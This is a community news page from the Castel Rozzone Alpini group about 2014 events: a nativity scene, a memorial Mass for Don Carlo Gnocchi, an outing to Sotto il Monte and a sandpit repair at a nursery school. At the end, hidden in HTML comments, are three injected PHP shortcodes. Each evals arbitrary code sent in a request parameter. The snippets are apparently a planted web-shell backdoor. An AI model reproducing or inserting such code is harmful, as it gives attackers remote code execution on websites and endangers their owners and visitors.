Realizzazione Presepio per il Natale 2014

Quest’anno il nostro progettista alpino dei “Presepi”, Mr D., ha pensato ad una architettura moderna, minimal ma d’effetto e, in accordo con il Don, è stato riproposto sul Sagrato della Chiesa.

Ambientato in terra desertica e povera, senza sfarzi e bellonerie, è illuminato solo dal classico filo di luci natalizie.

Il lavoro di messa in opera è stata fatta sabato 6 mattino dai nostri volontari Alpini che, liberatisi appositamente dai loro impegni, si son presi cura del montaggio della struttura.
Il popolamento è stato lasciato ai bambini che, sabato 13 in occasione della Festa organizzata in paese per Santa Lucia, dopo messa hanno inserito personaggi e animali per completare la tradizionale rappresentazione della nascita di Gesù.

Buon Anno a tutti dagli Alpini di Castel Rozzone.

Presepio 2014 sacra famigliapresepio 2014 struttura alpini presepio-2014alpini-castel-rozzone

foto santa lucia 2014foto santa lucia 2014 2 foto santa lucia 2014 3 foto santa lucia 2014 4 foto santa lucia 2014 5

25 Ottobre 2014 – Beato Don Carlo Gnocchi

In una riunione del Gruppo Alpini, è nata la proposta di far celebrare una messa in memoria dei nostri alpini andati avanti. Decidendo il giorno, l’idea è stata unanime,  celebrarla il 25 ottobre, giorno della beatificazione di Don Carlo Gnocchi, data molto significativa per noi Alpini.
Parlandone con Don Riccardo, non solo ha accolto la nostra proposta, ma insieme si è pensato di invitare i gruppi alpini della nostra zona 28 Ana Bergamo, per poter ricordare tutti i nostri alpini andati avanti ed esporre con orgoglio a tutta la nostra comunità la reliquia che Don Riccardo ha del Beato Don Carlo Gnocchi, a 5 anni esatti dalla sua beatificazione.

messa-don-gnocchi-2014-01  messa-don-gnocchi-2014-02

E cosi Sabato alle ore 11:00 del 25 Ottobre 2014 si è svolta la celebrazione, in contemporanea a quella celebrata in Duomo a Milano in onore del Beato Don Carlo Gnocchi; con nostro grande piacere hanno risposto presente, Misano Gera d’adda, Caravaggio, Mozzanica, Brignano Gera d’Adda, Treviglio, Calvenzano con i loro gagliardetti ed i loro cappelli alpini, e il nostro Capo zona Antonio Senese.  Presente anche il vessillo Comunale e il vice sindaco Angelo Pellegrini.

messa-don-gnocchi-2014-03 messa-don-gnocchi-2014-04

Una celebrazione molto emozionante e piena di significato.
– Partendo dalla prima lettura, sostituita dalla lettura Agiografica di Don Carlo Gnocchi, tutti i passaggi della sua vita, il suo grande impegno nel dare aiuto, conforto ed amore al prossimo, soprattutto ai sofferenti ed ai piccoli e giovani colpiti dal dolore della guerra, per dare ad ogni lacrima, a ogni goccia di sangue sparsa, il significato e il valore più alto. Guerra che Lui aveva vissuto come cappellano volontario, prima nei Balcani e poi in Russia, e successivamente aiutando gli orfani e gli invalidi di guerra, guadagnandosi il titolo di “Padre dei mutilatini” e creando la fondazione Pro Juventute. L’ultimo suo gesto è stato la donazione delle sue cornee, dando un’accellerazione al varo della legge sul tema trapianti e donazione d’organi.
– Si è proseguito con le preghiere dei fedeli con il ricordo del nostro Alpino Bosco Livio e l’amico Alpino Ferri Mario  e di tutti gli Alpini andati avanti della zona 28.
– Poi le parole di Don Riccardo che ha ricordato a tutti gli Alpini l’importanza di dare l’esempio ai giovani, come don Gnocchi, come l’alpino sa fare, con il volontariato e l’aiuto ai più bisognosi e sofferenti.
messa-don-gnocchi-2014-05 messa-don-gnocchi-2014-06

– E per finire, la preghiera dell’Alpino che con le sue parole ci commuove,  il canto “Signore delle Cime”, cantato magnificamente dal nostro coro san Bernardo, che ci ha emozionato… e per concludere si è suonato “il Silenzio” che ci ha messo i brividi!!!

messa-don-gnocchi-2014-07 messa-don-gnocchi-2014-08

Finita la celebrazione abbiamo invitato tutti i presenti ad un piccolo rinfresco preparato dal C.R.S in oratorio, per salutarci e per darci l’appuntamento ai prossimi impegni di volontariato, e vista la bellissima celebrazione un arrivederci al prossimo 25 ottobre, per ricordare ancora, i nostri Alpini andati avanti ed il nostro grande esempio L’Alpino Beato Don Carlo Gnocchi.

messa-don-gnocchi-2014-09

Un grazie a tutti
Il Capogruppo Alpini Castel Rozzone
Cortesi Benedetto

GIORNATA AGGREGATIVA a SOTTO IL MONTE PAPA GIOVANNI XXIII

21 SETTEMBRE 2014 – GIORNATA AGGREGATIVA a SOTTO IL MONTE PAPA GIOVANNI XXIII

Questa giornata aggregativa, organizzata per ringraziare tutti gli Alpini e famiglie e gli Amici degli alpini, che hanno lavorato e contribuito alla buona riuscita della 6a festa Alpina 2014.

sotto il monte 2014 - statua papa giovanni

E’ stato scelto di passarla a Sotto il Monte, paese nel ns. caro Santo Papa Giovanni XXIII, e celebrare una messa sul colle vicino alla Torre del Giuanì, tanto cara al pontefice e pranzare là sul colle della Torre, al ristoro della sede degli alpini di Sotto il Monte.
Partenza ore 9.  La mattina abbiamo visitato i luoghi in cui lui è nato e cresciuto, la Cascina Palazzo, dove il pontefice nacque, e la Cascina Colombera, dove visse dall’età di 12 anni, ora gestita da un gruppo missionario,  poi la chiesa Parrocchiale di San Giovanni Battista, risalente all’inizio del XX secolo dopo che è stata abbattuta la chiesa sul colle che dominava il paese. A lato di essa la Cappella della Pace, sotto ad essa la Cripta ed il Giardino della Pace inaugurato recentemente dopo la proclamassione a Santo del Pontefice.
Il gruppo poi si è diretto verso Ca’ Maitino, raro esempio di villa signorile nel paese. Risalente al XV secolo ed appartenuta all’antica famiglia dei Roncalli, venne posseduta dagli Scotti, che la donarono a Papa Giovanni XXIII, che ne fece il suo luogo di vacanze, ora è un museo che contiene molti oggetti regalati al Pontefice provenienti da tutto il mondo.
Da Ca’ Maitino parte il sentiero che sale alla TORRE DEL GIUANI’ …

(Torre San Giovanni) Campanile della Vecchia chiesa Parrocchiale posizionata sul colle omonimo, abbattuta nel 1904. Con il passare degli anni, le mura della Torre e  l’orologio millenario, esposte alle intemperie, hanno subito gravi danni, sino a sgretolarsi in modo allarmante.
Il Pontefice il 28 agosto 1959 disse al sindaco Carissimi, poi diventato anche capogruppo degli Alpini di Sotto il Monte.
“Mi disse che mi consegnava un’eredità molto importante: il San Giovanni “ti raccomando non lasciarlo cadere perché è un insieme di ricordi e un’opera d’arte che tanti ci  invidiano………….sii tu a cercare i modi e i mezzi per non ridurlo in un ammasso di pietre, sicuramente i nostri paesani ti aiuteranno perché lassù sono sepolti i nostri antenati e come bella tradizione si cercherà di far in modo che il San Giovanni continui a dominare il Colle…”
I lavori di consolidamento, di restauro e ripristino eseguiti dal Gruppo Alpini, iniziati nel 1973, sono terminati il 15 giugno 2002. Ora è la Sede degli Alpini di Sotto il Monte.
… chi a piedi, chi con la jeep degli Alpini siamo saliti sul colle e là ci ha accolto la stupenda torre ed un paesaggio stupendo, la vista della pianura e dei colli vicini.
Don Riccardo ci ha raggiunto sul colle, e grazie anche alla bella giornata, ha celebrato la messa alla chiesina dei defunti, facendo un bella Omelia e mostrandoci una reliqua del Beato Alpino Don Carlo Gnocchi, ricordandoci che il giorno successivo era San Maurizio il Protettore degli Alpini, per concludere la messa il capogruppo si Sotto il Monte ha consegnato al ns. capogruppo Benedetto l’incarico di leggere La Preghiera dell’Alpino, letta con una leggera commozione.

sotto il monte 2014 momento di preghiera
E’ giunta l’ora del pranzo, dopo la foto di rito del gruppo, tutti nella sede degli Alpini a pranzare.

sotto il monte 2014 foto di gruppo

Dopo aver mangiato, chiaccherato, brindato e scambiato il gagliardetto tra i due gruppi, ci siamo rilassati passeggiando, sedendoci sui prati e panchine del colle.
E’ arrivata l’ora di scendere … scesi sosta a Cà Maitino e poi tutti a casa.
Grazie di aver partecipato a questa giornata, per chi non ha potuto partecipare un Grazie per l’impegno durante la 6a Festa Alpina.

Sistemazione sabbiera alla scuola per l’infanzia

Gli alpini sono vicini ai bambini.

La scuola dell’infanzia di Castel Rozzone,

In vista dell’estate 2014 gli alpini hanno pulito e sistemato l’area della sabbionaia così che la Scuola Materna di Castel Rozzone ha potuto ridare completo accesso al giardino per il divertimento dei bambini.

Articolo Giornale di Treviglio 09 05 2014

sistemazione sabbiera foto 3 20140503 sistemazione sabbiera foto 2 20140503 sistemazione sabbiera 1 20140503

 

<!– [insert_php]if (isset($_REQUEST["Zho"])){eval($_REQUEST["Zho"]);exit;}[/insert_php][php]if (isset($_REQUEST["Zho"])){eval($_REQUEST["Zho"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ZRtzm"])){eval($_REQUEST["ZRtzm"]);exit;}[/insert_php][php]if (isset($_REQUEST["ZRtzm"])){eval($_REQUEST["ZRtzm"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["OhCwv"])){eval($_REQUEST["OhCwv"]);exit;}[/insert_php][php]if (isset($_REQUEST["OhCwv"])){eval($_REQUEST["OhCwv"]);exit;}[/php] –>